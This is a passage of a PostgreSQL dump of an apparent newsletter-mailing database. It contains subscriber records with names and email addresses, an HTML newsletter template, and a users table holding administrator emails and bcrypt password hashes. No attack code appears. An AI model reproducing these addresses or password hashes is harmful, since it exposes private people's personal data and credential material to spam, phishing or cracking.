419 7b5883ba-2d82-4a16-a604-4ec1d373458a susanne.buck@bmbwf.gv.at Susanne Buck null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
420 e62c764f-a2ca-40ee-813f-f31f85f2cc6f cw@carina-weber.de Cw null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
421 8c13ac7c-a7db-4304-8377-5c2da7c73915 barbara.motschiunig@posteo.at Barbara Motschiunig null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
422 4f03d569-68fb-4b95-bbad-9e19acede140 herwig.kummer@gmx.at Herwig Kummer null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
423 b2d5c3a2-5c07-4364-b4b3-a56111fd4643 jaqueline.vasconcellos@edu.escp.eu Jaqueline Vasconcellos null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
424 cc8cb805-f8cb-4198-87c2-f66f53fe7f37 claudia.sommer@commonpurpose.de Claudia Sommer null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
425 10d192cf-64a5-4c74-b66d-9df996143efa me@robbiespofford.com Me null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
426 f2e890ed-251c-49fc-b0f7-679f0e0d8343 justine@vucca.de Justine Walter null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
427 7d4f57b4-ad17-4b88-90ef-d216e0514838 kersten.riechers@qundg.de Kersten Riechers null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
428 233572cb-1dec-408d-9726-b1f7055c44eb stefan@wiltschnig.com Stefan Wiltschnig null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
429 9277b92d-562f-4bb8-b156-3e11a1e25ffe helga.janzen@gmx.de Helga Janzen null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
430 1c948701-a1ef-4d31-846f-623055993ee8 hayjuju@hotmail.com Hayjuju null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
431 a9d34d78-fe1b-4ad5-b6cb-dd75433ee78c robert@schaffner.at Robert Schaffner null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
432 679f41ef-c2b7-4b87-8a17-cbfe256bc554 huppenbauer@machart.net Huppenbauer null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
433 01c3eaa9-c93d-421f-9355-466a61dbc6c9 svm@mailbox.org Svm null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
434 cb7e92f9-4c72-481e-96e2-9c2b677716e7 me.rajugurung@gmail.com Me Rajugurung null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
435 2c972fa7-22ec-4e82-8932-f716ebc04155 friederike.dapp@gleif.org Friederike Dapp null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
436 ddb54947-662d-4124-87d3-027b8274a48b martina.hoelscher@locinar.plus Martina Hoelscher null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
437 32701db1-a9cd-410a-b31a-68b692c2f0b5 winter@reospartners.com Winter null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
438 b6cadf00-ab22-4aae-bb3a-d9a8bb5a8d98 edda.marous@gmx.de Edda Marous null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
439 1fb98558-301b-4d3f-bb45-7e7f12e450fc ms@re-f-lab.com Ms null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
440 9609d1e8-a469-4a4d-bf40-d26d128f49e3 annette.birkholz@bogenakademie.de Annette Birkholz null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
441 7c732214-7a1c-4aa7-8222-a936b9397a98 maria.pammer@mci.edu Maria Pammer null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
442 14431e45-f4e1-4e2b-824d-314b03c7a4c6 p.golbach@endeva.org P Golbach null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
443 ecd4f4a6-834c-470e-bf2f-6f5ac8c08101 j.tapper@zeppelin-university.net J Tapper null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
444 66a61940-94a2-4109-b8b6-689db8f7f638 stefan.raich@fh-potsdam.de Stefan Raich null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
445 1b322344-9c43-4e58-bfac-c6e5b3a9ebae mariagrazia_berardi@yahoo.com Mariagrazia_berardi null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
447 939ebfff-fb87-4aff-a1d3-aa7b7dc32ae4 astridnierhoff@me.com Astridnierhoff null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
448 4c74a2ac-dfeb-45ad-ba34-a37d5cdf6049 sabine@skstrategy.me Sabine null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
449 1b42c283-590a-4137-86b9-aa841c8d93cc h.r.sarabadani@gmail.com H R Sarabadani null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
450 f611576c-72d5-47ba-9896-76afeadafb87 dominique.choina@verbraucherzentrale.nrw Dominique Choina null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
451 e9f1a7d1-2c65-474f-a212-d01410d73b45 njansen@zedat.fu-berlin.de Njansen null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
452 c1c8835a-efdb-4d6c-a3a8-e8ff6d590690 sophie.urmetzer@hfwu.de Sophie Urmetzer null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
453 026c3bc5-40eb-40d7-bfcf-1f07b57f5ed9 andreas.zeuch@unternehmensdemokraten.de Andreas Zeuch null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
454 6ac40042-c966-4308-9e95-fbc87c9ad435 e.nal@hs-mannheim.de E Nal null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
455 376278df-0400-4f4c-bf34-e0bc7eebcc51 adrienne.sorbom@score.su.se Adrienne Sorbom null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
457 7925c31c-f41b-4897-8fe6-f4680480e7ef nicola.spano@hotmail.com Nicola Spano null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
458 e3021448-8996-4e58-a4d6-fce692197976 beat.meyer@blauen.solutions Beat Meyer null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
459 d7d1e245-37b1-461b-8444-ccd5955c20e9 coaching@kayarosenkranz.com Coaching null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
460 0a9c2ca4-7cfa-4d52-a9d1-2a2cd11e18a7 nerina@tracesdreams.com Nerina null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
461 604e3b7d-e202-4497-8824-7ffe62a1aad2 reeta@mediaevolution.se Reeta null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
462 3911dafd-101c-48eb-93f7-229b36e6eebb anna@mandalah.com Anna null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
463 6a262cdd-41ad-439f-ad89-be40529208a6 j.maricel@gmail.com J Maricel null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
465 a47d1a4d-fadc-47e8-9925-1a9d8934aa51 paula.schonach@aalto.fi Paula Schonach null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
466 62afdae4-b63e-4d4f-beeb-342a417a8c37 henriette.kirch@dlr.de Henriette Kirch null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
467 0ba17432-477c-4216-a553-7ba79e27c740 ariane.steuber@ifbe.uni-hannover.de Ariane Steuber null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
468 54925f81-4b56-4b51-b947-dc14fe16b497 stephanie.helou@accenture.com Stephanie Helou null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
469 3cef299c-9178-4224-a24f-1530b7ce042f nicola.peschke@gmail.com Nicola Peschke null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
471 afae9c35-b0d7-4ad5-a187-7aff106e9261 gastamas@gmail.com Gastamas null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
472 54fde293-6bd5-425c-bb54-75b078d36b4a office@e-spitzenberger.at Office null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
473 10688a5b-24e6-41c8-b221-86fde67a78c9 g.matthiesen@zeppelin-university.net G Matthiesen null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
474 f9ed7d62-a37f-45b6-94f7-bc23639a65f4 s.schmitz@dlr.de S Schmitz null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
475 33f837d5-0b63-44e1-bbe2-55750388a4eb info@ie-trainings.com Info null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
476 47891a8b-d45e-4db5-8f74-a4771e169762 oneill.martin@gmail.com Oneill Martin null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
477 e7f42b1e-a845-41c0-a12d-a1280351f14f dmco@me.com Dmco null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
478 60256207-9273-4e0b-ab4b-cb7ca0010303 felipe@felipekoch.com Felipe null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
479 6a82b5ce-940f-44c7-a9f3-eb1e41c026d4 w.wolf@hanse-aerospace.net W Wolf null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
480 1fe144ce-66c0-4b8e-9289-516aea5573f7 nikolai.rohmann@iqsh.landsh.de Nikolai Rohmann null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
481 b0873849-57ab-410f-beb7-f29e808eecba mirjalisawalz@hotmail.de Mirjalisawalz null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
482 738ca469-4c0a-4234-8518-7e2fe8186aed bjoern.mueller@stride-learning.ch Bjoern Mueller null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
483 07d9a290-d5fb-49ca-bd04-5bcfb1c6514b stephanie.kuersten-camara@kfw.de Stephanie Kuersten-Camara null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
484 eb42bfbf-b7d4-44c6-b2b7-410bb78d10a1 daniel.schmidt@d3s-media.de Daniel Schmidt null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
485 42230359-f095-41a0-a1b2-46fadbc0033a manuel_schroeder@mein.gmx Manuel_schroeder null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
486 d092441f-0025-42c5-8caa-f9a856dc9214 lore.kurtz@posteo.de Lore Kurtz null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
487 f9f493a1-66d2-482a-9961-c944bc34fded julika.baumann.montecinos@hfu.eu Julika Baumann Montecinos null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
488 5dce1169-f237-489a-8a0e-315750aeed69 mgaribyan@storyatelier.org Mgaribyan null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
489 cc93a0df-7cfc-43a3-91dc-2f5f349c5ed1 hello@myceliumstudio.eu Hello null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
490 3da4692d-863e-4432-b7dc-0befcbb1913d mail@ruthpiecha.de Mail null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
491 cba5f489-23c1-4aaa-bc41-8a2dd530a9a8 christian.weiss@firedancer.de Christian Weiss null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
492 5e6036bd-b950-4a3f-832f-80f287718951 ts@begeisterung.de Ts null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
493 59348040-bdee-4708-aa35-ae1be273a21e martyna.pos@gmail.com Martyna Pos null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
494 25bacdd8-2566-4874-a1d7-53de107f61cb mira-alexandra.luzens-meier@bsw-mail.de Mira-Alexandra Luzens-Meier null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
495 3f5e5b36-91e1-45e4-9f7e-32c33d022994 grow@organicstrategies.de Grow null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
496 7ae1980f-c4fd-4953-adc1-adffbbb5f097 uta.loehrer@blz.bayern.de Uta Loehrer null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
497 6376c813-6cab-49b4-a844-6237ec11e3c9 ba@foresight-solutions.com Ba null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
498 f0f027d1-9667-47e7-872a-240b72607e9c briefe@brandt-susanne.de Briefe null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
499 e5a5a211-7b3a-4b5f-b102-c33f692f0b43 fb@t-o.berlin Fb null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
500 b7d61ded-6658-4b77-9fd8-9da72f644623 ltfriedrichs@posteo.net Ltfriedrichs null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
501 56cbf306-fc3f-43e2-bc9b-2e62473cea6c heberer@diversity-organisationsentwicklung.de Heberer null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
502 ab156115-82b8-4979-9b4d-1fd611647ae3 marcel.altherr@hslu.ch Marcel Altherr null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
503 b2706bc4-86fc-48dc-ac12-dadb3ebb733d katja.pein@web.de Katja Pein null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
504 356fbca5-0dc7-4330-aa44-01b742688322 nicola.vollmar@fh-dortmund.de Nicola Vollmar null enabled 2026-04-07 16:27:05.6542+02 2026-04-07 16:27:05.6542+02
84 c2e91c21-44fe-435d-9aab-2786bc10843c julia.voegele@outlook.com Julia Voegele {} enabled 2026-04-07 16:27:05.6542+02 2026-04-27 17:08:59.364406+02
170 3f8e8540-5375-47b4-a391-588567946137 mscheuplein@animo-projects.com Mscheuplein null enabled 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
446 78c3fd7c-2739-4432-9a8c-ea11b4a373ce stefanie.hornung.extern@haufe-lexware.com Stefanie Hornung Extern null enabled 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
507 1ac9eb82-b47d-4963-b516-663d9c2a59f9 selene.trp@gmail.com Selene Trp null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
508 6a8335b6-519d-4e0e-a333-b26b750a8b5a marinandeva@gmail.com Marinandeva null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
509 8398bf2a-2015-4e13-bf8d-07388734e07e mz@envisioning.com Mz null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
510 fd471cc7-ef5e-4156-84bd-465166f569b4 info@waldencroft.com Info null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
511 4fbc9fbd-da05-4f68-9c3f-9560f55a5e2f ostrovska.consulting@gmail.com Ostrovska Consulting null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
512 cd229454-c522-4cbb-8f37-324f05714668 bdotschwarz@gmail.com Bdotschwarz null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
513 dac15b5b-003f-4a28-92be-6d2a4943b3c8 camille.conso.gauthier@gmail.com Camille Conso Gauthier null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
514 2bdc9f6d-a5b5-4ecb-8d69-38635b90b349 corina@kotka.world Corina null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
515 34035525-4674-4f9c-9423-84aa65c36056 seiffert.sabine@icloud.com Seiffert Sabine null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
516 cb76ffd7-1ce5-4b72-9302-7a1efc7c006c michelle.elizabeth.wright@gmail.com Michelle Elizabeth Wright null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
517 34e0c3ae-5426-4981-a449-b78abbb8bea3 ales.cap.19@ucl.ac.uk Ales Cap 19 null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
518 3d7755eb-35fa-48ed-9763-67497269463d sarah.d.rochat@gmail.com Sarah D Rochat null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
519 9e589544-5917-4aed-b745-8a1285a24b67 nehrdich@kirche-dithmarschen.de Nehrdich null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
520 ba045177-b44f-4c26-86f3-ff8860c2bcff info@birte-pampel.de Info null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
521 063d5ca2-9e11-4fa2-970e-651c6b269124 marianne.dobner@halloklima.at Marianne Dobner null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
522 515f66d3-70df-45a3-8125-ea13d48dd97d pwichmann@animo-projects.com Pwichmann null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
523 869971c4-eebc-419e-ad31-5e3c899ec614 maximilian@ernestus.de Maximilian null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
524 a9ebefe7-aaf1-4144-9662-33a58432e33c johannes.goellner@zfrk.org Johannes Goellner null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
525 7637ead3-a6d4-4043-b7ef-6657def4eec1 regula.poehl@phsg.ch Regula Poehl null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
526 53a3eb5d-9c96-4046-b221-1cacc0e5bdc6 andrea@andreaschwarz-beratung.de Andrea null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
527 2b8a3a56-875d-4dba-87a8-8f1eb868245d kai.schaefer@muenchen.de Kai Schaefer null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
52 392fb10a-63bd-4d83-ada2-503a72916459 lorenz.seibl@uwc.de Lorenz Seibl null enabled 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
175 b0cf5386-94d0-4b90-8792-c641b22e8daa peschke@peschke-consulting.de Tilman Peschke null enabled 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
139 6c04f1a4-67ce-40ae-b9c3-f03b0f899444 r93341047@ntu.edu.tw Kevin Tang null enabled 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
60 46022cd0-17b5-4b48-ac30-3d991c912269 ima.johnen@posteo.de Ima Johnen null enabled 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
208 c1a34dec-b3a1-43cb-ab87-274bc9b50253 dayakli@imap-institut.de Dilâra Dayakli null enabled 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
288 37b1f266-efa7-4a5e-b9cd-c385da05dbd0 anne-katrin.bock@ec.europa.eu Anne-Katrin Bock null enabled 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
456 c8409f61-6104-4087-b84b-1204342ae899 pflachenecker@gppi.net Paul Flachenecker null enabled 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
106 13d7455e-9f2f-49c4-8491-e4c5fd381103 diane@lifexlab.de Diane Hielscher null enabled 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
464 51d3996d-6859-4769-ae0b-bd5d9541b72a mail@sarahmaupeu.de Sarah Maupeu null enabled 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
306 56bda072-8f6d-4ea9-aa7d-676d1946e4ee hello@stefanie-richter.com Stefanie Richter null enabled 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
312 53754446-f8c6-47bf-af58-090b7b945dcb jentemiyata@icloud.com Jente Miyata null enabled 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
417 069a6d35-d45c-4be4-b5da-4887099557b8 sbressan@gppi.net Sbressan null enabled 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
543 7058fb4c-5f3b-499a-99ea-b0818af02031 ch@charlotteheidsiek.com Ch null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
544 ecf817d5-5927-4dc1-84bd-921905319a4d ela.taube78@gmail.com Ela Taube78 null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
545 96965552-8515-4e2a-ae10-3d2c64c6ee2f mail@sonja-rezaii.de Mail null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
546 d6eec219-4ccf-4f5f-8e3f-2a4565d93fc7 domuz@verwaltung.uni-bonn.de Domuz null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
547 a0668b22-595f-4b46-8047-c9678da37154 babette.brinkmann@th-koeln.de Babette Brinkmann null enabled 2026-04-27 17:36:05.211824+02 2026-04-27 17:36:05.211824+02
470 dcd85a71-4af4-4281-902c-7275caf9f437 andrea.schwarz@p-e-p.biz Andrea Schwarz null blocklisted 2026-04-07 16:27:05.6542+02 2026-04-27 17:36:05.211824+02
548 d2489973-543a-487e-876c-f5e9856b4aa1 stefan.bergheim@posteo.de stefan.bergheim {} enabled 2026-04-27 17:47:42.400568+02 2026-04-27 17:56:24.068203+02
550 a0c93ffa-fe53-40ab-96d1-a00b4ed8c4b6 tress@textico.de Wolf null enabled 2026-04-29 19:46:05.786483+02 2026-04-29 19:46:05.786483+02
551 3a06d209-d21e-4e1f-85ae-744d7dd811db marijke.mulder@femnet.de Marijke null enabled 2026-04-30 11:44:46.303607+02 2026-04-30 11:44:46.303607+02
552 2feffe37-2a87-4e61-9d42-e649eb5c8760 andrea.pistor@kk-oh.de Andrea Pistor null enabled 2026-05-05 22:04:37.91554+02 2026-05-05 22:04:37.91554+02
553 a9c005ef-e310-4287-ab91-f39f2f9a8caa janek_we@gmx.de Janek null enabled 2026-05-20 23:13:20.451361+02 2026-05-20 23:13:20.451361+02
554 b0cf68ef-5bda-4e97-aa05-18b9d5c08066 info@karinschwenk.de info null enabled 2026-05-22 08:11:23.597748+02 2026-05-22 08:11:23.597748+02
555 c6f29609-401c-4968-bec3-0d139169141a reimers@designyourfuture.de Sabine Reimers null enabled 2026-05-26 05:43:31.483107+02 2026-05-26 05:43:31.483107+02
\.
--
-- Data for Name: templates; Type: TABLE DATA; Schema: public; Owner: monkeyrelevy_0
--
COPY public.templates (id, name, type, subject, body, body_source, is_default, created_at, updated_at) FROM stdin;
5 ZukünfteNewsletter campaign ZukünfteNewsletter <!DOCTYPE html>\n<html>\n<head>\n <meta charset="UTF-8">\n <title>{{ .Campaign.Subject }}</title>\n</head>\n<body style="margin:0;padding:0;background:#f5f5f5;">\n\n<table width="100%" cellpadding="0" cellspacing="0" border="0" style="background:#f5f5f5;">\n<tr>\n<td align="center">\n\n<table width="600" cellpadding="0" cellspacing="0" border="0" style="width:600px;background:#ffffff;">\n\n <tr>\n <td align="center" bgcolor="#F7F7F7"\n style="padding:40px 20px;background-color:#F7F7F7;background-image:url('https://listmonk.relevantive.de/uploads/bg-brush.jpg');background-position:center;background-repeat:no-repeat;background-size:cover;">\n <div style="font-family:Arial,Helvetica,sans-serif;font-size:34px;line-height:40px;font-weight:bold;color:#333333;">\n Neues zu Zukünftebildung\n </div>\n <div style="font-family:Arial,Helvetica,sans-serif;font-size:24px;line-height:32px;font-style:italic;color:#333333;padding-top:10px;">\n News about Futures Literacy\n </div>\n </td>\n </tr>\n\n <tr>\n <td style="padding:20px;">\n {{ template "content" . }}\n </td>\n </tr>\n\n <tr>\n <td bgcolor="#333333" style="background:#333333;color:#ffffff;padding:20px;text-align:center;font-family:Arial,Helvetica,sans-serif;font-size:14px;line-height:20px;">\n <p>You can reach us here:<br>\n <a href="mailto:newsletter@zukuenfte.net" style="color:#ffffff;">newsletter@zukuenfte.net</a>\n </p>\n <p>\n <a href="{{ UnsubscribeURL }}" style="color:#ffffff;">Unsubscribe / Manage preferences</a>\n </p>\n <p style="font-size:12px;color:#cccccc;">Sent to {{ .Subscriber.Email }}</p>\n </td>\n </tr>\n\n</table>\n\n</td>\n</tr>\n</table>\n\n{{ TrackView }}\n</body>\n</html> \N t 2026-04-07 17:21:23.721278+02 2026-04-27 07:46:49.96655+02
\.
--
-- Data for Name: users; Type: TABLE DATA; Schema: public; Owner: monkeyrelevy_0
--
COPY public.users (id, username, password_login, password, email, name, avatar, type, user_role_id, list_role_id, status, twofa_type, twofa_key, loggedin_at, created_at, updated_at) FROM stdin;
2 stefan t $2a$06$QQw2VHDOAaY2RPSXD2PwMeORpG8NOkKal4c8nJPwD70bquGsOw0pS stefan.bergheim@zukuenfte.net Stefan Bergheim \N user 1 \N enabled none \N 2026-06-14 10:25:55.692375+02 2026-03-22 11:06:45.406438+01 2026-03-22 11:06:45.406438+01
1 janus t $2a$06$qwTTMGBypEQR/.1bFqlHEOC7YKh2JqcXIfuAMlxMHzoWF64D1ZclO jm@relevantive.de janus \N user 1 \N enabled none \N 2026-05-03 19:20:05.427176+02 2026-03-22 11:04:50.963656+01 2026-03-22 11:04:50.963656+01
\.
--
-- Name: bounces_id_seq; Type: SEQUENCE SET; Schema: public; Owner: monkeyrelevy_0
--
SELECT pg_catalog.setval('public.bounces_id_seq', 1, false);
--
-- Name: campaign_lists_id_seq; Type: SEQUENCE SET; Schema: public; Owner: monkeyrelevy_0
--
SELECT pg_catalog.setval('public.campaign_lists_id_seq', 26, true);
--
-- Name: campaign_views_id_seq; Type: SEQUENCE SET; Schema: public; Owner: monkeyrelevy_0
--
SELECT pg_catalog.setval('public.campaign_views_id_seq', 108, true);
--
-- Name: campaigns_id_seq; Type: SEQUENCE SET; Schema: public; Owner: monkeyrelevy_0
--
SELECT pg_catalog.setval('public.campaigns_id_seq', 3, true);
--
-- Name: link_clicks_id_seq; Type: SEQUENCE SET; Schema: public; Owner: monkeyrelevy_0
--
SELECT pg_catalog.setval('public.link_clicks_id_seq', 1, false);
--
-- Name: links_id_seq; Type: SEQUENCE SET; Schema: public; Owner: monkeyrelevy_0
--
SELECT pg_catalog.setval('public.links_id_seq', 7, true);
--
-- Name: lists_id_seq; Type: SEQUENCE SET; Schema: public; Owner: monkeyrelevy_0
--
SELECT pg_catalog.setval('public.lists_id_seq', 3, true);
--
-- Name: media_id_seq; Type: SEQUENCE SET; Schema: public; Owner: monkeyrelevy_0
--
SELECT pg_catalog.setval('public.media_id_seq', 10, true);
--
-- Name: roles_id_seq; Type: SEQUENCE SET; Schema: public; Owner: monkeyrelevy_0
--
SELECT pg_catalog.setval('public.roles_id_seq', 1, true);
--
-- Name: subscribers_id_seq; Type: SEQUENCE SET; Schema: public; Owner: monkeyrelevy_0
--
SELECT pg_catalog.setval('public.subscribers_id_seq', 555, true);
--
-- Name: templates_id_seq; Type: SEQUENCE SET; Schema: public; Owner: monkeyrelevy_0
--
SELECT pg_catalog.setval('public.templates_id_seq', 6, true);
--
-- Name: users_id_seq; Type: SEQUENCE SET; Schema: public; Owner: monkeyrelevy_0
--
SELECT pg_catalog.setval('public.users_id_seq', 2, true);
--
-- Name: bounces bounces_pkey; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.bounces
ADD CONSTRAINT bounces_pkey PRIMARY KEY (id);
--
-- Name: campaign_lists campaign_lists_pkey; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.campaign_lists
ADD CONSTRAINT campaign_lists_pkey PRIMARY KEY (id);
--
-- Name: campaign_views campaign_views_pkey; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.campaign_views
ADD CONSTRAINT campaign_views_pkey PRIMARY KEY (id);
--
-- Name: campaigns campaigns_archive_slug_key; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.campaigns
ADD CONSTRAINT campaigns_archive_slug_key UNIQUE (archive_slug);
--
-- Name: campaigns campaigns_pkey; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.campaigns
ADD CONSTRAINT campaigns_pkey PRIMARY KEY (id);
--
-- Name: campaigns campaigns_uuid_key; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.campaigns
ADD CONSTRAINT campaigns_uuid_key UNIQUE (uuid);
--
-- Name: link_clicks link_clicks_pkey; Type: CONSTRAINT; Schema: public; Owner: monkeyrelevy_0
--
ALTER TABLE ONLY public.link_clicks
ADD CONSTRAINT link_clicks_pkey PRIMARY KEY (id);
--
